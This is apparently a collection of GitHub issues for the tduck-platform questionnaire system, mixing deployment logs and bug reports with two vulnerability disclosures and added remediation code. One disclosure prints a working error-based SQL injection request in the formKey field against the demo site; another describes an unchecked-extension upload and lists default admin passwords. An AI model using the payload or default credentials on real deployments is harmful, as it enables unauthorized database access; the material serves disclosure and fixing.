tduckcloud / tduck-platform
A questionnaire system that can be privatized and deployed - 填鸭表单问卷系统(tduck-survey-form)
Home Page: https://www.tduckcloud.com
License: MIT License
Spring Boot message:
s.w.s.m.m.a.RequestMappingHandlerMapping : Mapped to org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#errorHtml(HttpServletRequest, HttpServletResponse)
Accessing the front end gives a 404 error.
Accessing with curl gives no message at all.
Suggestion for the maintainers: put the business logic in the service layer, otherwise there are no transactions.
After a questionnaire has been filled in, it would be perfect if there were a print function.
Based on experience and its name, this class is basically a generic class that serves as the unified entry point for the file upload feature. If a file can be uploaded, there may be a risk of it being executed. After reading part of the Spring Boot documentation, I found the following.
First we enter the avatar function. It receives the data named file and assigns it to file; the type is [MultipartFile](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/multipart/MultipartFile.html), the class Spring Boot uses to receive file contents.
**Then we reach line 37, where the target path is assigned, and this is where the problem lies. file.getOriginalFilename() returns the full name of the uploaded file, and FileUtil.extName extracts that file's extension. A random value is used as the name and assigned to path. The extension here is under our control.** This is the core of the vulnerability.
String path = IdUtil.simpleUUID() + '.' + FileUtil.extName(file.getOriginalFilename());
Next we reach the file-handling code at line 38. It calls OssStorageFactory.getStorageService(); stepping into that method, it does a simple check of the default properties and enters build(). The build function is the important part, so click through into it.
It first assigns config and checks the upload properties; cloud upload is supported. If nothing is configured, it goes straight into the else branch and uploads the file locally.
At line 44 it creates an ApplicationHome object and assigns Domain and UploadFolder on config, then creates and returns a LocalStorageService. Back at the original call OssStorageFactory.getStorageService().upload(file.getInputStream(), path): here LocalStorageService is the implementation class of OssStorageFactory. Entering LocalStorageService's upload method, shown below:
It receives the incoming file stream and path; line 23 sets the target file path, which ends with path. Since path was renamed earlier, directory traversal is not possible, but by this point the file has already been uploaded and the extension was never checked. It then returns the data.
That completes the file upload. As for exploitation, currently only HTML can be uploaded; other types are not parsed.
Looking at the installation docs shows that we install the site by downloading the SQL database directly. The official site also tells us to create a database and then import this SQL file to set up the site.
This creates two accounts by default: [email protected] and [email protected]. The [email protected] account is the administrator account. Their passwords are 123456 and 12345678 respectively, both stored as hashes.
Given that this SQL file is the one used for developing the site and contains the site's configuration, developers will generally configure with the default account and password directly rather than deleting the initial account and password.
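The analysis above shows the stored name inheriting whatever extension the client sent. Below is an added example (not code from tduck-platform) of how an avatar endpoint can keep the random-name scheme while rejecting anything that is not an allowlisted image by both extension and leading bytes; the allowlist, the signature table and the class name are assumptions.

```java
import java.io.IOException;
import java.io.InputStream;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

// Added example, not tduck-platform code: name an avatar upload without trusting the
// client-supplied extension. The allowlist and signature table are assumptions for an
// avatar endpoint, not values taken from the project.
public final class SafeUploadName {
    private static final Set<String> ALLOWED =
            new HashSet<>(Arrays.asList("png", "jpg", "jpeg", "gif"));
    // Leading bytes of the accepted formats: a renamed .html fails this check even
    // though its name would pass the allowlist, so it never reaches the upload folder.
    private static final byte[] PNG  = {(byte) 0x89, 'P', 'N', 'G'};
    private static final byte[] JPEG = {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF};
    private static final byte[] GIF  = {'G', 'I', 'F', '8'};

    /** Extension after the last dot of the base name, lower-cased; "" if absent. */
    static String extensionOf(String originalFilename) {
        if (originalFilename == null) return "";
        int cut = Math.max(originalFilename.lastIndexOf('/'), originalFilename.lastIndexOf('\\'));
        String base = originalFilename.substring(cut + 1);
        int dot = base.lastIndexOf('.');
        return dot < 0 ? "" : base.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    /** True when the first bytes of the file carry the signature expected for ext. */
    static boolean contentMatches(byte[] head, String ext) {
        byte[] magic;
        if ("png".equals(ext)) magic = PNG;
        else if ("jpg".equals(ext) || "jpeg".equals(ext)) magic = JPEG;
        else if ("gif".equals(ext)) magic = GIF;
        else return false;
        return head.length >= magic.length && Arrays.equals(Arrays.copyOf(head, magic.length), magic);
    }

    /**
     * Returns "<uuid>.<ext>" as the original code does, but only for an allowlisted extension
     * whose content starts with the matching signature; throws otherwise. Consumes the first
     * bytes of content, so open a fresh stream (file.getInputStream()) for the actual copy.
     */
    public static String forUpload(String originalFilename, InputStream content) throws IOException {
        String ext = extensionOf(originalFilename);
        if (!ALLOWED.contains(ext)) {
            throw new IllegalArgumentException("extension not allowed: " + ext);
        }
        byte[] buf = new byte[8];
        int n = content.read(buf);
        if (!contentMatches(Arrays.copyOf(buf, Math.max(n, 0)), ext)) {
            throw new IllegalArgumentException("content does not match ." + ext);
        }
        return UUID.randomUUID().toString().replace("-", "") + "." + ext;
    }
}
```

Serving the upload folder with X-Content-Type-Options: nosniff and Content-Disposition: attachment additionally stops a browser from rendering a stored file as a page, which is the HTML case the post describes.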
502 when accessing after deployment, with no access logs
tduck-platform | :: Spring Boot :: (v2.7.8)
tduck-platform |
tduck-platform | 2023-04-14 15:09:13.527 INFO 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : Starting TduckApiApplication using Java 1.8.0_272 on bf7cbaa2d908 with PID 9 (/application/BOOT-INF/classes started by root in /application)
tduck-platform | 2023-04-14 15:09:13.539 DEBUG 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : Running with Spring Boot v2.7.8, Spring v5.3.25
tduck-platform | 2023-04-14 15:09:13.540 INFO 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : The following 1 profile is active: "prod"
tduck-platform | 2023-04-14 15:09:13.568 INFO 9 --- [kground-preinit] o.h.validator.internal.util.Version : HV000001: Hibernate Validator 6.2.5.Final
tduck-platform | 2023-04-14 15:09:15.321 INFO 9 --- [ main] .s.d.r.c.RepositoryConfigurationDelegate : Bootstrapping Spring Data MongoDB repositories in DEFAULT mode.
tduck-platform | 2023-04-14 15:09:15.346 INFO 9 --- [ main] .s.d.r.c.RepositoryConfigurationDelegate : Finished Spring Data repository scanning in 18 ms. Found 0 MongoDB repository interfaces.
tduck-platform | 2023-04-14 15:09:16.356 INFO 9 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 8999 (http)
tduck-platform | 2023-04-14 15:09:16.370 INFO 9 --- [ main] o.a.coyote.http11.Http11NioProtocol : Initializing ProtocolHandler ["http-nio-8999"]
tduck-platform | 2023-04-14 15:09:16.371 INFO 9 --- [ main] o.apache.catalina.core.StandardService : Starting service [Tomcat]
tduck-platform | 2023-04-14 15:09:16.373 INFO 9 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.71]
tduck-platform | 2023-04-14 15:09:16.475 INFO 9 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext
tduck-platform | 2023-04-14 15:09:16.476 INFO 9 --- [ main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 2805 ms
tduck-platform | 2023-04-14 15:09:16.736 WARN 9 --- [ main] n.sf.ehcache.config.CacheConfiguration : Cache 'eternal_cache' is set to eternal but also has TTI/TTL set. To avoid this warning, clean up the config removing conflicting values of eternal, TTI and TTL. Effective configuration for Cache 'eternal_cache' will be eternal='true', timeToIdleSeconds='0', timeToLiveSeconds='0'.
tduck-platform | 2023-04-14 15:09:18.944 INFO 9 --- [ main] com.zaxxer.hikari.HikariDataSource : DatebookHikariCP - Starting...
tduck-platform | 2023-04-14 15:09:19.205 INFO 9 --- [ main] com.zaxxer.hikari.HikariDataSource : DatebookHikariCP - Start completed.
tduck-platform | 2023-04-14 15:09:19.214 DEBUG 9 --- [ main] c.t.c.e.m.SysEnvConfigMapper.selectList : ==> Preparing: SELECT id,env_key,env_value,create_time,update_time FROM sys_env_config
tduck-platform | 2023-04-14 15:09:19.241 DEBUG 9 --- [ main] c.t.c.e.m.SysEnvConfigMapper.selectList : ==> Parameters:
tduck-platform | 2023-04-14 15:09:19.372 DEBUG 9 --- [ main] c.t.c.e.m.SysEnvConfigMapper.selectList : <== Total: 2
tduck-platform | 2023-04-14 15:09:20.165 INFO 9 --- [ main] .a.c.c.AjCaptchaServiceAutoConfiguration : 自定义配置项:
tduck-platform | AjCaptchaProperties{type=DEFAULT, jigsaw='', picClick='', waterMark='tduck', waterFont='WenQuanZhengHei.ttf', fontType='WenQuanZhengHei.ttf', slipOffset='5', aesStatus=true, interferenceOptions='0', cacheNumber='1000', timingClear='180', cacheType=local, reqFrequencyLimitEnable=false, reqGetLockLimit=5, reqGetLockSeconds=300, reqGetMinuteLimit=100, reqCheckMinuteLimit=100, reqVerifyMinuteLimit=100}
tduck-platform | 2023-04-14 15:09:20.169 INFO 9 --- [ main] c.a.c.s.impl.CaptchaServiceFactory : supported-captchaCache-service:[local]
tduck-platform | 2023-04-14 15:09:20.175 INFO 9 --- [ main] c.a.c.s.impl.CaptchaServiceFactory : supported-captchaTypes-service:[clickWord, default, blockPuzzle]
tduck-platform | 2023-04-14 15:09:20.200 INFO 9 --- [ main] com.anji.captcha.util.ImageUtils : 初始化底图:[SLIDING_BLOCK=[Ljava.lang.String;@30517a57, ORIGINAL=[Ljava.lang.String;@3dde5f38, PIC_CLICK=[Ljava.lang.String;@79ad1774]
tduck-platform | 2023-04-14 15:09:20.201 INFO 9 --- [ main] c.a.c.s.i.ClickWordCaptchaServiceImpl : --->>>初始化验证码底图<<<---clickWord
tduck-platform | 2023-04-14 15:09:20.374 INFO 9 --- [ main] c.a.c.s.i.ClickWordCaptchaServiceImpl : 初始化local缓存...
tduck-platform | 2023-04-14 15:09:20.493 INFO 9 --- [ main] com.anji.captcha.util.ImageUtils : 初始化底图:[SLIDING_BLOCK=[Ljava.lang.String;@33a47707, ORIGINAL=[Ljava.lang.String;@4d290757, PIC_CLICK=[Ljava.lang.String;@720a1fd0]
tduck-platform | 2023-04-14 15:09:20.495 INFO 9 --- [ main] c.a.c.s.i.BlockPuzzleCaptchaServiceImpl : --->>>初始化验证码底图<<<---blockPuzzle
tduck-platform | 2023-04-14 15:09:20.575 INFO 9 --- [ main] c.a.c.s.i.BlockPuzzleCaptchaServiceImpl : 初始化local缓存...
tduck-platform | 2023-04-14 15:09:20.834 INFO 9 --- [ main] c.tduck.cloud.api.config.JacksonConfig : 初始化 jackson 配置
tduck-platform | 2023-04-14 15:09:20.959 INFO 9 --- [ main] o.s.b.a.w.s.WelcomePageHandlerMapping : Adding welcome page: class path resource [static/index.html]
tduck-platform | 2023-04-14 15:09:21.162 ERROR 9 --- [ main] c.t.c.storage.cloud.OssStorageFactory : 更新存储配置失败:null
tduck-platform | 2023-04-14 15:09:23.152 INFO 9 --- [ main] o.a.coyote.http11.Http11NioProtocol : Starting ProtocolHandler ["http-nio-8999"]
tduck-platform | 2023-04-14 15:09:23.185 INFO 9 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat started on port(s): 8999 (http) with context path ''
tduck-platform | 2023-04-14 15:09:23.209 INFO 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : Started TduckApiApplication in 10.366 seconds (JVM running for 10.822)
tduck-mysql | 2023-04-14 14:10:20+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | 2023-04-14 14:10:20+08:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql'
tduck-mysql | 2023-04-14 14:10:20+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | '/var/lib/mysql/mysql.sock' -> '/var/run/mysqld/mysqld.sock'
tduck-mysql | 2023-04-14T06:10:21.174903Z 0 [Warning] [MY-011068] [Server] The syntax '--skip-host-cache' is deprecated and will be removed in a future release. Please use SET GLOBAL host_cache_size=0 instead.
tduck-mysql | 2023-04-14T06:10:21.176340Z 0 [Warning] [MY-010918] [Server] 'default_authentication_plugin' is deprecated and will be removed in a future release. Please use authentication_policy instead.
tduck-mysql | 2023-04-14T06:10:21.176374Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.32) starting as process 1
tduck-mysql | 2023-04-14T06:10:21.182663Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started.
tduck-mysql | 2023-04-14T06:10:23.525901Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended.
tduck-mysql | 2023-04-14T06:10:24.646375Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed.
tduck-mysql | 2023-04-14T06:10:24.646610Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel.
tduck-mysql | 2023-04-14T06:10:24.749448Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory.
tduck-mysql | 2023-04-14T06:10:24.787622Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock
tduck-mysql | 2023-04-14T06:10:24.787883Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.
tduck-mysql | 2023-04-14T07:08:30.309381Z 0 [System] [MY-013172] [Server] Received SHUTDOWN from user <via user signal>. Shutting down mysqld (Version: 8.0.32).
tduck-mysql | 2023-04-14T07:08:32.310562Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 24 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.311031Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 25 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.311717Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 26 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.312211Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 27 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.312629Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 21 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.312903Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 22 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.313388Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 23 user: 'root'.
tduck-mysql | 2023-04-14T07:08:34.007348Z 0 [System] [MY-010910] [Server] /usr/sbin/mysqld: Shutdown complete (mysqld 8.0.32) MySQL Community Server - GPL.
tduck-mysql | 2023-04-14 15:08:36+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | 2023-04-14 15:08:36+08:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql'
tduck-mysql | 2023-04-14 15:08:36+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | '/var/lib/mysql/mysql.sock' -> '/var/run/mysqld/mysqld.sock'
tduck-mysql | 2023-04-14T07:08:36.640496Z 0 [Warning] [MY-011068] [Server] The syntax '--skip-host-cache' is deprecated and will be removed in a future release. Please use SET GLOBAL host_cache_size=0 instead.
tduck-mysql | 2023-04-14T07:08:36.641872Z 0 [Warning] [MY-010918] [Server] 'default_authentication_plugin' is deprecated and will be removed in a future release. Please use authentication_policy instead.
tduck-mysql | 2023-04-14T07:08:36.641903Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.32) starting as process 1
tduck-mysql | 2023-04-14T07:08:36.710657Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started.
tduck-mysql | 2023-04-14T07:08:38.112355Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended.
tduck-mysql | 2023-04-14T07:08:39.256039Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed.
tduck-mysql | 2023-04-14T07:08:39.256233Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel.
tduck-mysql | 2023-04-14T07:08:39.389391Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory.
tduck-mysql | 2023-04-14T07:08:39.410490Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock
tduck-mysql | 2023-04-14T07:08:39.410632Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.
Version information
Is this the latest code: yes
Does the demo environment have this problem?
Demo environment address: https://form.777nx.cn
Provide the address of a demo environment in which you reproduced the problem
Steps to reproduce
I added a user in User Management and then got a SQL statement error
Error updating database. Cause: com.mysql.cj.jdbc.exceptions.MysqlDataTruncation: Data truncation: Data too long for column 'avatar' at row 1
### The error may exist in com/tduck/cloud/account/mapper/UserMapper.java (best guess)
### The error may involve com.tduck.cloud.account.mapper.UserMapper.insert-Inline
### The error occurred while setting parameters
### SQL: INSERT INTO ac_user ( name, avatar, gender, phone_number, email, password, password_type, create_time, update_time ) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ? )
### Cause: com.mysql.cj.jdbc.exceptions.MysqlDataTruncation: Data truncation: Data too long for column 'avatar' at row 1
; Data truncation: Data too long for column 'avatar' at row 1; nested exception is com.mysql.cj.jdbc.exceptions.MysqlDataTruncation: Data truncation: Data too long for column 'avatar' at row 1
Then, within the downloadFormResultFile method of the downloadFormResultFile class (com.tduck.cloud.api.web.controller.downloadFormResultFile), this method is invoked.
According to the route information, access the URL address and use error-based injection to retrieve the database name, thereby verifying the existence of the vulnerability.
Verify using the official demo environment (https://demo.tduckapp.com/project) and register a user with the registration function ([email protected]/123456).

POST /user/form/data/query?timestamp=1702986363697&sign=d40296262a3e99f608de2a9d7e435658 HTTP/1.1
Host: demo.tduckapp.com
Cookie: Hm_lvt_4dbdbc5421c41984499f878628d60f2f=1702985656; Hm_lpvt_4dbdbc5421c41984499f878628d60f2f=1702985890
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyMTMyMSIsImlhdCI6MTcwMjk4NTg0NCwiZXhwIjoxNzAzNTkwNjQ0fQ.illpxfzf2O1AeJ3Ra3AHLgRufKgL9_KK1MAwfu0_l9C7GxSJT_ta9cDipGVWEhMijrS79N3lAksz7DgUzlhwUg
Content-Length: 122
Origin: https://demo.tduckapp.com
Referer: https://demo.tduckapp.com/project/form/data?key=MVWB25aE&active=data&type=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"authGroupId":null,"formKey":"MVWB25aE' or updatexml(1,concat(0x7e,user(),0x7e),1)='1","filter":{},"size":10,"current":0}
A SQL error page is produced and user() is echoed back successfully; the vulnerability is verified.
The corresponding search method in FormDataMysqlService.java applies no restriction to the formKey parameter passed in the request and concatenates it directly into the SQL, which is then executed.
This SQLi affects the latest current version (v4.0).
Use precompiled (prepared) statements with bound parameters.
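The report says the search method concatenates formKey into the SQL text, and the suggested fix is prepared statements with bound parameters. The following is an added example, not FormDataMysqlService code: the unsafe shape next to the same query with formKey bound, plus an up-front format check. The table and column names (fm_form_data, form_key, original_data), the form-key pattern and the class name are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

// Added example, not code from tduck-platform: the search-by-formKey query written with a
// bound parameter instead of string concatenation. Table/column names and the form-key
// format are assumptions for illustration.
public final class FormDataSearch {

    // Form keys in the report look like "MVWB25aE" (assumed format); rejecting anything else
    // up front yields a clean 400 and a log line instead of odd input reaching the database.
    private static final Pattern FORM_KEY = Pattern.compile("^[A-Za-z0-9]{6,32}$");

    static boolean isValidFormKey(String formKey) {
        return formKey != null && FORM_KEY.matcher(formKey).matches();
    }

    /** The unsafe shape the report describes: formKey is pasted into the SQL text. */
    static String vulnerableSql(String formKey) {
        return "SELECT id, form_key, original_data FROM fm_form_data WHERE form_key = '"
                + formKey + "' LIMIT 10";
    }

    /**
     * Same query with the value bound at execution time. The driver sends formKey as data,
     * so a value such as "MVWB25aE' or updatexml(...)='1" is compared literally and matches
     * no row instead of being parsed as SQL.
     */
    public static List<String> search(Connection conn, String formKey, int size) throws SQLException {
        if (!isValidFormKey(formKey)) {
            throw new IllegalArgumentException("malformed formKey");
        }
        String sql = "SELECT id, form_key, original_data FROM fm_form_data WHERE form_key = ? LIMIT ?";
        List<String> rows = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, formKey);
            ps.setInt(2, size);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    rows.add(rs.getString("original_data"));
                }
            }
        }
        return rows;
    }
}
```

In a MyBatis mapper the same distinction is #{formKey} (bound parameter) versus ${formKey} (raw text substitution into the statement).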
// Aliyun official API reference: request.setTemplateParam("{\"变量1\":\"值1\",\"变量2\":\"值2\",\"变量3\":\"值3\"}")
request.setTemplateParam("{\"name\":\"Tom\", \"code\":\"123\"}");
Erroneous file: AliyunSmsServiceImpl.java
Erroneous code, line 46: Map<String, Object> params = ImmutableMap.of("code", templateParams);
The deployment docs do not explain how to add parameters in Docker to configure the mailbox and the WeChat official account. Could you let me know? Thanks!